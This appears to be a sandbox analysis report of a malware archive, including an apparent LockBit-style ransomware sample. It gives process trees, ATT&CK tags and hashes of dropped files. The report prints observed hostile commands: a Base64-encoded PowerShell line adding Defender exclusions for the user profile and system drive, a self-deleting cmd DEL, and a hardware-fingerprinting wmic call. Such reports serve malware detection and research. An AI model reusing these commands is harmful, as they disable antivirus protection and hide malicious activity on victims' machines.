  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2164,3302423398110616880,11248550919679624408,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6304 /prefetch:8
  2⤵
  PID:7480

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:2024

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:3416

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:3392

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:2192

C:\Users\Admin\Downloads\Malware-main\Malware-main\AssetLoader.exe
"C:\Users\Admin\Downloads\Malware-main\Malware-main\AssetLoader.exe"
1⤵
- Drops file in Windows directory
PID:2500
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAegBtACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHMAdQBoACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGcAegB3ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAawBwACMAPgA="
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:4804
- C:\Windows\Asset2.exe
  "C:\Windows\Asset2.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  PID:540
- - C:\Windows\System32\Wbem\wmic.exe
    "wmic.exe" csproduct get uuid
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:888
- C:\Users\Admin\Assetloader antivm.exe
  "C:\Users\Admin\Assetloader antivm.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - Suspicious use of AdjustPrivilegeToken
  PID:4560

C:\Users\Admin\Downloads\Malware-main\Malware-main\LB3.exe
"C:\Users\Admin\Downloads\Malware-main\Malware-main\LB3.exe"
1⤵
- Drops desktop.ini file(s)
- Sets desktop wallpaper using registry
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5108
- C:\Windows\splwow64.exe
  C:\Windows\splwow64.exe 12288
  2⤵
  - Drops file in System32 directory
  PID:6316
- C:\ProgramData\8777.tmp
  "C:\ProgramData\8777.tmp"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  PID:6636
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /C DEL /F /Q C:\PROGRA~3\8777.tmp >> NUL
    3⤵
    PID:6876

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
- Modifies registry class
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
PID:5984
- C:\Windows\system32\NOTEPAD.EXE
  "C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Downloads\Malware-main\Malware-main\README.md.I6xwb3fYM
  2⤵
  PID:6472

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k PrintWorkflow -s PrintWorkflowUserSvc
1⤵
PID:6200

C:\Windows\system32\printfilterpipelinesvc.exe
C:\Windows\system32\printfilterpipelinesvc.exe -Embedding
1⤵
- Drops file in System32 directory
PID:6400
- C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
  /insertdoc "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\{3D70BCCB-814F-49F2-A095-1EB36BDC3A88}.xps" 133523331074550000
  2⤵
  - Checks processor information in registry
  - Enumerates system info in registry
  - Suspicious behavior: AddClipboardFormatListener
  - Suspicious use of SetWindowsHookEx
  PID:6568

C:\Windows\system32\NOTEPAD.EXE
"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Downloads\Malware-main\Malware-main\I6xwb3fYM.README.txt
1⤵
PID:5460

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Defacement

T1491

Replay Monitor

Loading Replay Monitor...

Downloads

C:\$Recycle.Bin\S-1-5-21-3803511929-1339359695-2191195476-1000\QQQQQQQQQQQ

Filesize
129B

MD5
01b4c885a84961d4f373261adb5525dd

SHA1
448ad863ef89f4eb37b25764143d408f60318d85

SHA256
889c13e34406d92ce4e5d50b4d9b25c0ba729925768b71ec5cdc4ec3c9b9b9b8

SHA512
8c441ed1f10c44a0b68b0b6257ae5a35638e50088a82f5f51bbfa02e7d882a8f383b93da6981de45afe9af778ddde969d51969b88474215c297745efdb8a873e

Download Submit
C:\I6xwb3fYM.README.txt

Filesize
1KB

MD5
23354dbea523c383823114b19409d983

SHA1
d9fead9f7088c0578e555b050fe21c160887deac

SHA256
a397e5bc31a02b20780f19747aafc9f2b7af62e92cfe61ec4136961c07593d95

SHA512
8d87d521e5a75b925080b1f26e7ff1177bfbc56498915e0c3782f6ff9d9cc65ec8764718c166b47ad835c33b1d2448c872935c957b5f2379c5fe8f7062965671

Download Submit
C:\ProgramData\8777.tmp

Filesize
14KB

MD5
294e9f64cb1642dd89229fff0592856b

SHA1
97b148c27f3da29ba7b18d6aee8a0db9102f47c9

SHA256
917e115cc403e29b4388e0d175cbfac3e7e40ca1742299fbdb353847db2de7c2

SHA512
b87d531890bf1577b9b4af41dddb2cdbbfa164cf197bd5987df3a3075983645a3acba443e289b7bfd338422978a104f55298fbfe346872de0895bde44adc89cf

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
1386433ecc349475d39fb1e4f9e149a0

SHA1
f04f71ac77cb30f1d04fd16d42852322a8b2680f

SHA256
a7c79320a37d3516823f533e0ca73ed54fc4cdade9999b9827d06ea9f8916bbc

SHA512
fcd5449c58ead25955d01739929c42ffc89b9007bc2c8779c05271f2d053be66e05414c410738c35572ef31811aff908e7fe3dd7a9cef33c27acb308a420280e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\29883d78-dc42-4bf4-beac-1d030c93f74a.tmp

Filesize
1KB

MD5
3f643a7ab41e7310997ceb12f93ea241

SHA1
9a397a4cdad379444eb22b36701a7ac3dc8af692

SHA256
d668f6e83508284c584303a8fcd67e2f03656eb4691d7d7061eeaba75df6dafa

SHA512
68318278eafab7c7cb0bbfec0dc409b6b7e67171dec6b880673afe88416b357f8aa185431860e779f9ec0457cf6aa4fd69eb6f2d1a6c597a604ebfd6d9ef7cf2

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000002

Filesize
24KB

MD5
657ed1b9ac0c74717ea560e6c23eae3e

SHA1
6d20c145f3aff13693c61aaac2efbc93066476ef

SHA256
ff95275ab9f5eadda334244325d601245c05592144758c1015d67554af125570

SHA512
60b6682071ade61ae76eed2fe8fa702963c04261bd179c29eed391184d40dc376136d3346b3809b05c44fb59f31b0e9ab95f1e6b19e735234d1f0613720e532f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000003

Filesize
49KB

MD5
4b4947c20d0989be322a003596b94bdc

SHA1
f24db7a83eb52ecbd99c35c2af513e85a5a06dda

SHA256
96f697d16fbe496e4575cd5f655c0edb07b3f737c2f03de8c9dda54e635b3180

SHA512
2a3443e18051b7c830517143482bf6bffd54725935e37ee58d6464fac52d3ce29c6a85fc842b306feaa49e424ba6086942fc3f0fea8bb28e7495070a38ce2e59

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000004

Filesize
43KB

MD5
fa938d13f992578fab849f63ad6758d0

SHA1
35f74de235395966c309187b2256270518a13d15

SHA256
c83bea6acdb959657946efaa2cc6a971506bf4b56ecb0c4951e89193b78caa95

SHA512
6d665cbc05fc826e83111014d0258867ccaee6e05d3f7457c78a8843e8c88c6d8c4175979b37e7795e22b6c5b0a4aaa161e8948c1262bbad4422870d0788e0d0

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000006

Filesize
20KB

MD5
8b2813296f6e3577e9ac2eb518ac437e

SHA1
6c8066353b4d463018aa1e4e9bb9bf2e9a7d9a86

SHA256
befb3b0471067ac66b93fcdba75c11d743f70a02bb9f5eef7501fa874686319d

SHA512
a1ed4d23dfbe981bf749c2008ab55a3d76e8f41801a09475e7e0109600f288aa20036273940e8ba70a172dec57eec56fe7c567cb941ba71edae080f2fdcc1e0c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00000b

Filesize
22KB

MD5
bde0ef1e7e917b98c4fe904e6e3e754f

SHA1
ac5c4f8ce019d60579f02aecb1c586bfba499608

SHA256
85ea592877e2fadf25d022608e6bb550dd847164fbd67d0b4ea74551a5439bfc

SHA512
ef6714c21d07c3b115a3cc68b82eee4fe8a8fdaa3e3e8c8326b9e4fd382a168ae92e865a8aca0cb36e6ca9094493577471a379b425482019402f887e0c217d71

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
1KB

MD5
6dd090ed7c3ccbaf725d880484774f0c

SHA1
4d43f5cdfed06929fe5a5f2dbc858ac6239f30cd

SHA256
038c0efc2d8704a4ac07805d966ad15007b38cfc38e02c7cef2930935a32d014

SHA512
92652ed9d1f833b5597c64807cf80399df2a0f5089bda53e7791e86423e99f378d070ea6483403ee2d55624d590428739bf2e75c280437e6f78050ec5c64b6cb

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
2KB

MD5
1e922deed9a0ebe2ec667f871f012c1d

SHA1
59ae5ffedc61d8e2495e132264b0843198d7099e

SHA256
d5372c3588083aa754543459520f7a355db77073fb97f1ca870b1081e6df2575

SHA512
16a44c95758acce493ee19d12936e221f0e193ed588709e28cb87560953269f2e59c3b01271607bb56c662b3448aa9bb17558756c770b4d5be3744fd44b60b80

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

Filesize
573B

MD5
9eb18fe98cf25f47e34c39ecdf2e786f

SHA1
6df3fcee6265cc692b278da4e8b9024fa8776982

SHA256
f9ee8fe817718fc64ae137f03a4e64d47e27216283f53f1847e62a9654e60433

SHA512
736a1524a2d29fddb2be6b5f7607fbb71e6fec6dd24ca928731fc23c8ccbadf451f47470e58a172efa38d34058b5e4aca29a8e9a7be9267b5aa8104031c5c5e5

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

Filesize
656B

MD5
7d61d5093520d1eb090f4da83c327a4a

SHA1
814d0c1b03893fc18f6d04330f71fe13964e9355

SHA256
350f633cea2e4549b06cb737c8596ae9374f26b97522d6e751570658be75fb8d

SHA512
5b39839a08676b73a103d71a5837d67b948dd9a5a26c5b6bb94a339615fd381900aa39ebbb12855f314c7948fb2d79436517aca3f72d8049de3f6b4c9f4b5b67

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
d31deb5b73c7a9d567e911df2f14d8e6

SHA1
b78f555c491adf478e2ffe246f3df0bbab24dc62

SHA256
dcef0fdaa127097956640085bee5f4a60965ff9d499a1742756d3de57bed8d17

SHA512
08b81b38902fafcc0a5f456386000db5c4ca3c3e8a5c2975ab48092b44d13604c8cbbfb652d2cdabd7615116bef8385573bafb0b6d8fcb6e1108afc15b7a98d6

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
5KB

MD5
cf50a9d980229c6150a8ae7c1fa0db5c

SHA1
4e21aeb5c7f5f44349687e626cd05e913688b781

SHA256
ee5af24a9edaf593c71746d87b35a165114ab81a25cc022fcb725701c072b215

SHA512
f98fa6e4e8923b874ee696518f6c3427174a86911afda2320dfd7c91ec05ddba6b097993429a936ba3339585ee36d7df4c43c2e44459106873892fe689178566

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
5KB

MD5
c13ac54965af019921342a8f3d101bdb

SHA1
7775ff395f9a8b04acba10c9310cfbc2fabca302

SHA256
8a0b31b33245805c11251db390a67024b16ef568518d850c4d7f492aa8ca4bf1

SHA512
50cc55a9ba39ad1f8d02c47612540cdfb3b38a69dbce94701ea5bf4bf31f5aec48e9e1ebd4225f7ac0f3d1433cfde3a14e634d8a24f8f134dfff8dce2b8e18c7

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
64081d7bb57901f503f90d87d7db58ef

SHA1
56ca9018b6b0d1a2d75f73d13a37204073820f8a

SHA256
ee8559cbb3bdf43d3ae079cf7b4a6df5aad17ba78e1ef1f43340f9031b8b6cea

SHA512
f2b51660751f8c4663130f26b07f36a0822a9202b5759a1ecd7a4c06b5df3625cb47c605c0e1dbf2709359a91d1ef4c2600b026b025e78a38bef393812e767ee

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
dfeabc4550f87b29c9d1c1d2337b2c88

SHA1
439591d97b6f95219484985bfebf633223fb2cd2

SHA256
387982ab8d3973080d20e26effc102bfe75fec38d82e8e6fb27cc203ae195230

SHA512
5f0c97ab528e313c2efae2240fc604c4ed3031c8052e0f3698b9b59767b97a10b16cd6414c2001b030c4fb5dea2b6ca04ec72aee014ed21096d321805d853039

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
26e4c6a5c3003d881bdbe05edf56de81

SHA1
657585ba813954ddded34e3bc362da007ecad23b

SHA256
9da3bf1c7a739167ceb4a33ef9065b119ad18df772e0d89828a9793cf758e375

SHA512
1d73a391cffd8dad2d0c9ff4888685a3be4a5662680e60e731c762cfc214a99ea63d6af1fdbdeee275dc6c08758ec7743604e691b071f33817d1bd59f3cc47bd

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences

Filesize
24KB

MD5
e664066e3aa135f185ed1c194b9fa1f8

SHA1
358ff3c6ad0580b8ae1e5ef2a89a4e597c2efdc5

SHA256
86e595be48dbc768a52d7ea62116036c024093e1302aced8c29dd6a2d9935617

SHA512
58710818b5f664006a5aa418da6c8cd3f709c2265bc161f81b9dfe6cdb8304fabaa4ce9deba419fe4281623feeeaa0321f481ae5855d347c6d8cf95968ee905e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
1KB

MD5
29494641b3d89cc25a91c00bf6cc8cff

SHA1
bcdb16c94d4f51d3463079bf93f2110c969a8eeb

SHA256
6f7dc5f0abc36529561c3039065f1bf5811f3c857e8de8ce1cbc1880e96d2ccd

SHA512
01cc0f16aa8543b6e78bb335cbbcee0163de7f075d3e576fd87111af0059ca9942865250f72b26169fa72679053a0357a6b0ce9362c708fb6b851ebdf7c922ae

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
1KB

MD5
e140647dcfe0959a3be20624dcd959c8

SHA1
4b975b464c4210501f73f777cae5f010adb71b07

SHA256
69311c3b3aaea90da3875b358f3b63f993fc97ff07d529ffad813d15bca93b11

SHA512
1a7bf7773b31e20f5714969c9cc267ddc11858d20c64f9487cde9fdfc11baee8d411130007e5ed47532e272c4a87e4abcc304eaacbb0e8f0c56e0664aa6d8ae0

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
1KB

MD5
252e4eb4a641a7baf8348f0b4628fccc

SHA1
2f7a770bebcd1630e47a85efede64de23f332a40

SHA256
025b78efda7db95225a131a6bad013d763caf3f61e1e7b0a9f532f5e9019e1ac

SHA512
caf5d40c67371637db0ec0c37f348af93b5aee95e49e3f1c6f18970478a754e2acc1c8b5d662ef0b876e29ea3495b0af76f9a91b1a46f8e97b6644d69c6a005d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
1KB

MD5
708dc1f467f88cc3f2187876440b04a1

SHA1
de611d1a85cc9c1f966594d9f053faeeb97d3a66

SHA256
7afd790762953b7ced77e69054384ca7ea8bd924b3d58ab929955028db7f2f15

SHA512
4bf40ac27a371832bbc2b2f909cacc8ce479f880dbca8354ade47093bdc504356daf9a1c6a05a728203383b04aaba3c902d21f9c43b62288937a3a672a937253

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
864B

MD5
a898fb65b473e6b142cd44db392762ab

SHA1
52352312d6d05f411e9e9ae1174908b65538b804

SHA256
00c1d435eb81c3bb217d040b767f8dd389be09ef763a84a14487d0d9c19f8f27

SHA512
a00cf0e1fba79270ba30aa0dd5115041d10bf263acb8de8c56a6cdbb34a072652ffc35bb541c6b4daa54f3b704614b7953d7cf6798920e4b2baa9791684c1899

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity~RFe57c2f2.TMP

Filesize
698B

MD5
2ec6b4cb10ce917fd621e4be8e3f2f36

SHA1
1333f7da875826473503246532e51dc39c219e38

SHA256
31811b400fd69a32093f8d8fc4b4dafecb636a0b7c601fdc7274ef7dba4a6209

SHA512
235fabdcbe6041410075bfbb24a7ee49f91fb58127040e9f680bf7cb5221ae185dbd3ec0f13d0883945613dc289648cc5bfa08114a2e01f624902c01c57f527d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

Filesize
16B

MD5
6752a1d65b201c13b62ea44016eb221f

SHA1
58ecf154d01a62233ed7fb494ace3c3d4ffce08b

SHA256
0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd

SHA512
9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
10KB

MD5
beca67ba45eac812b5b219e2eae6ff8d

SHA1
c88fc062e234a27a2d6434d7b6c09f796c34dfa3

SHA256
c3785c42b7947e403fc34820585d0d1d1f2a4af871a756803f3900b8f07b7f2f

SHA512
ca37a83c6f66283ef6eb0f35d486f0f813cc92548c3237fa1b9ffc85d568e76b82e4c8eede8fdc901c7476f514e3ad98c561e4e87d85b51595199fed43ea25df

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
11KB

MD5
9385a642fd1ef70bd02bf24ab4587397

SHA1
6292c90811771d0e54710e7e928e0553c96c1309

SHA256
0d4bf2a5eb710579a94713ae23cb9d7912b77774a83922c263d0aaf13f5c9cd3

SHA512
b591c89dec6223b64c0bc4b7504b6ebf55850b4fcb87e09e16a9ad6c0eb82f29b019ab32a2941e7abb01b940c5ad18b17fd11173211ef3ab2a6a057c28b59b5e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
10KB

MD5
8e8fa1af0604a7e1b284a02aa128b0ca

SHA1
75c639799963d331d365bd2a1b1d287e1725bfec

SHA256
da0f9cbe0e3a3069965739fc227a1d359f2064ca82c72233d4ff7cab1aea2736

SHA512
58c7b2e5125a8a1bb427531149c860f29bd4fe699298e556551ed285b4ecf4c7b95c31322452ae331f7766581da39def79f6812e2eba1f63f4f9499e434f7438

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
11KB

MD5
9a016dfb55397892a7894e51750b352e

SHA1
9d9334d7703d8b2750ee5a20cb86c3fc30f99eba

SHA256
7d874dc2c208cf9cf6448752badc0e2592c7a87926d471594624916462716316

SHA512
a75f600895cbbc6d58b340292cd8c143ea98b99dbca23ec70e6c6c4d2f8876410f3b7e6dbe8d29c227699d441d9f4fa505eac66ccf090a8b94469f564ff33641

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\e9e16117-82c4-4286-a873-14fc635283f1.tmp

Filesize
10KB

MD5
cab15208821bffe33466ca8e6d466772

SHA1
c03027463c7cc783817705386e54d41b09b566f3

SHA256
097bce7a9636ef93022e6f070430ceb0d2deca3e800aa0655a16d5a4111153dd

SHA512
fb7562884ee47c489ef1979829fd77d7a32c8088425063028d91f38e2ea8c5823ad7cd949b1d387596e98c4da9b37be659f2c2014df6f48a619f3d141647dc03

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\TokenBroker\Cache\9cd93bc6dcf544bae69531052e64647ec02f2bb4.tbres

Filesize
4KB

MD5
40604aad580e2e901e9e9a3d4259553f

SHA1
806acae0c45a788e890ecad9be3b8fbcdd4da2c7

SHA256
811f69f07b124ae5058cd34b2b24edc120e26ab58a6c80b73072168cfe4569af

SHA512
dc56096fc82c9f74b4b1af5e58fcaeefa472ed012a075b358c6c1690ed2cda2e533343cce47815ba85ad1fac4bf8a29523de826012d7316860202a2826aeb300

Download Submit
C:\Users\Admin\AppData\Local\Temp\.ses

Filesize
279B

MD5
1c99fcc463b6c072feb19195b10416d6

SHA1
07aa56c23d41292c9c4934fc17bf38e182225ba4

SHA256
1a02f91fe495fc1a238e2960ffb7daa48ee8ce538221dcf71a7f706a1b264dde

SHA512
2775fcc030be128f0a7cc9527d07f6c5759b711146a95f6b9521c550b4dcd483046d8f9a531ef91f9b6e43e204495a3c0399b0ae3c49076b2339e80a0fcbcf81

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_qwue0h5h.5pl.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\{BCF322A6-32F4-40C6-AAEC-1F7515A031BB}

Filesize
4KB

MD5
6a1f1f5e9e978082bccdf7355c1c253e

SHA1
c0b33fbc0bb59598c696fb46c31e6dad9140e13a

SHA256
98352f25b55634c496e05a35227e7b83cb8079fb0d9a6bec7242a7c9580dd9f3

SHA512
4c011acf750170994bfdcf5462b3826ac7a49e3f48eabbe85f7d64284cfee1b6a37d0ae5a4eae115850f2ef73897205893099e8b7c33f3d1f64de9c7819c372f

Download Submit
C:\Users\Admin\Assetloader antivm.exe

Filesize
509KB

MD5
312dc29e26719196342dfbea5c3c619f

SHA1
d535090fd472defacf564b977379885f608b04c6

SHA256
51aa7ed6016c305ff8b1f0f2a9e5de2f6796780142e43beeb7d20fea6792983f

SHA512
097379db014f5277872b72b113fad214a27fd009562debb60510551cbf9a76c389e1cd0f17bbedf1c060c4db944eb484e8a21d6e936f4d6a1780f8b44583a482

Download Submit
C:\Users\Admin\Documents\OneNote Notebooks\My Notebook\Open Notebook.onetoc2

Filesize
4KB

MD5
a90e845f05f03736ca9764cf24d6e592

SHA1
f8eba935c655c36621561c7b30332d4586b45e08

SHA256
eefcd2e586e5630cb165d1b5b0b5adcfa6ab6cbea5f74339c4612510ad9c49e8

SHA512
477834d48a0504f62c718b4fa93a49b9dd9d450543a2dd64d3bf5e4a5753e5882bf049ecd1e21ed728f665146ca7079aaa9678f667b508cee58c03bbbbab624a

Download Submit
C:\Users\Admin\Downloads\Ipgrabber-Grabberipdiscord.zip

Filesize
405B

MD5
e1191e87d8ffa399fcef31d30640d15e

SHA1
da2286e3567b80240c9f5fc1e660a055d09144c2

SHA256
d88015b6d31d6e6c831ef001567f6d439ff7c62b4afb3b86e372a467cccd1984

SHA512
f8758995d0facb318a6be84f5a8ac510a77c7c0d2f1483b61475b17172bbb1007ad6b45e2c66f0136c1478b2dcb39b66b88ec43d5010f8fb0cf4f643f8385eaa

Download Submit
C:\Users\Admin\Downloads\Ipgrabber-Grabberipdiscord.zip

Filesize
662B

MD5
b5add8f7a7518f7e8927861242266d8f

SHA1
11a6906528db014666814614b92caa2ed7391197

SHA256
745b0c60499d85a91bd3d3478e486f9a83e0fab0ce0cc0d7281f1ca489e99728

SHA512
9664d98a113a70c6384945fa6bf88fd0f1873981629a7b6131c248321cae7742e90f44b6983f13bb19f0472d2e4f5409a4b6e574384b943f9bbe1f8d77173385

Download Submit
C:\Users\Admin\Downloads\Malware-main.zip

Filesize
837KB

MD5
13757f87f61a4cb46fa63fbb127d92b9

SHA1
e18557263536ec604423dd0e795cb3e2f5528598

SHA256
0936ca09c4647418334337a2e2d0f643e8d5999b01ba3513fe1f034d2539d83a

SHA512
8ee6d4f65f184cc540747c675b1323af72cf200279a550e50889eebd37fca763466f3c6d525daf67a530e61d1984dc64186fc38ad2740da8b90593cc46ab2e00

Download Submit
C:\Users\Admin\Downloads\Malware-main.zip

Filesize
837KB

MD5
d37dd588bc0ed625837c8e44a525d2bb

SHA1
d5313b35af55dd3fe25d04857a08f8ebb2ff1672

SHA256
c8afc32d07c801b0e6be1a1bbd51769013401545379793419c7d6e7059460131

SHA512
7beab9a028bbc4f95b1fe42c5977b164edbb95d5e271879ec785761e552696179b8caacd66497e51274fe2e6b0d8793f093372e3345d77a18925312098819b41

Download Submit
C:\Users\Admin\Downloads\Malware-main\Malware-main\DDDDDDD

Filesize
147KB

MD5
5c15a4b96e1414a3a3eebd7f7cb43e4d

SHA1
b1c5026c12cfe59d2504ee72889ac41b64705bfc

SHA256
1f7dc21d3692ba326529ac05e885776a62ca4aab3e8c3bdddc9353a6fc9e88de

SHA512
0643b6ff592fdefd428eb7592ca22356bda51445c6239f9bf6cd9e7dc17631ef8c08541dc91b9017190b248c153a296ba0c4792c752a3b068ffbcbfbbebbcf3a

Download Submit
C:\Users\Admin\Downloads\Malware-main\Malware-main\README.md.I6xwb3fYM

Filesize
256B

MD5
53bf580028c875ba3121b8345b3c29f3

SHA1
4a66bcd500bdb4d84819ca5d6cc4840fded921b4

SHA256
1c502faa373cdcd43bed8bdcfcbb32299873b27e1640c08cda42161819fe34f4

SHA512
5aaa7487984480f3a8a698d8e4e5e422e039cc065a732c5bb08ec40bc5e0307fee5cf52e2b885106020017a84db672e696c3e738e56a47f0d584e7f93623fbb9

Download Submit
C:\Users\Admin\Downloads\Unconfirmed 129735.crdownload

Filesize
65B

MD5
b8d2ac07b04cee5b745e7c26023a3a40

SHA1
4b2117990ebd5b5611a2b7e4c78c159216d8334d

SHA256
438e9c40b90360ddfe728256ec97309c9870f43818f675d53d13f457a6137245

SHA512
2043c5fbca3c22f2e0b954e4696960f8ccd9b4d933cf1d8aec5f11b3db0041668a40a3ce200974ae5afb631112326aa6f030bde0224200316644a367acec5674

Download Submit
C:\Users\Admin\Downloads\Unconfirmed 129735.crdownload

Filesize
332B

MD5
8844b6ec238cb7ebe9db2aa9cd863d5a

SHA1
2449dabdc882b810dc133347cb155b052a3168a6

SHA256
19e2203f919c295f4ecef59f4da078a53c61a3e3bc2d8b3d2bd167531ab62813

SHA512
ef6789c786d72f9737e0fa3fa827d9da9ec9ed4eb4d50fd6e338953d3732d375e3646964c8befae8621db34afef2d7ca2eb59f6f11716696de8852a7eb4f7e5b

Download Submit
C:\Windows\Asset2.exe

Filesize
229KB

MD5
0ab4933561d0d0e46e6b0655fae45ab8

SHA1
0f5b70fb2e26ad72e8a7f60b5620f1304c943f93

SHA256
f1e8ade46fbeaa9aeb2e477ef5b256c4bcc1ff519e37d7374ce4a7323108e657

SHA512
2369e1470fee29d8b79c7e97075da640dc1d9f3c552db433585e2e93c264d81799e1971b3e2118ad529a0f121b48103051398374e15af3238600ae8c0fac51f5

Download Submit
F:\$RECYCLE.BIN\S-1-5-21-3803511929-1339359695-2191195476-1000\DDDDDDDDDDD

Filesize
129B

MD5
0e0d09dcb01d40d8dcf9de181e6518e1

SHA1
22313db0a390680c335c822631b31202bb9a1405

SHA256
495602254a0040d940965b3f64117f5c4effa47f64208c1ec6006074f36b5683

SHA512
b3fbf574aafa923afa8926618c064965648d6c87d359aa86e43b25a0125ff6e440beb6292fb6758b3681335fefe984928fb75f5cf8a0395c87680b8405204af5

Download Submit
memory/540-697-0x000001A41C860000-0x000001A41C870000-memory.dmp

Filesize
64KB

Download
memory/540-664-0x000001A402200000-0x000001A402240000-memory.dmp

Filesize
256KB

Download
memory/540-690-0x00007FFF905D0000-0x00007FFF91091000-memory.dmp

Filesize
10.8MB

Download
memory/540-729-0x00007FFF905D0000-0x00007FFF91091000-memory.dmp

Filesize
10.8MB

Download
memory/2500-698-0x00007FFF905D0000-0x00007FFF91091000-memory.dmp

Filesize
10.8MB

Download
memory/2500-651-0x0000000002470000-0x0000000002480000-memory.dmp

Filesize
64KB

Download
memory/2500-650-0x00007FFF905D0000-0x00007FFF91091000-memory.dmp

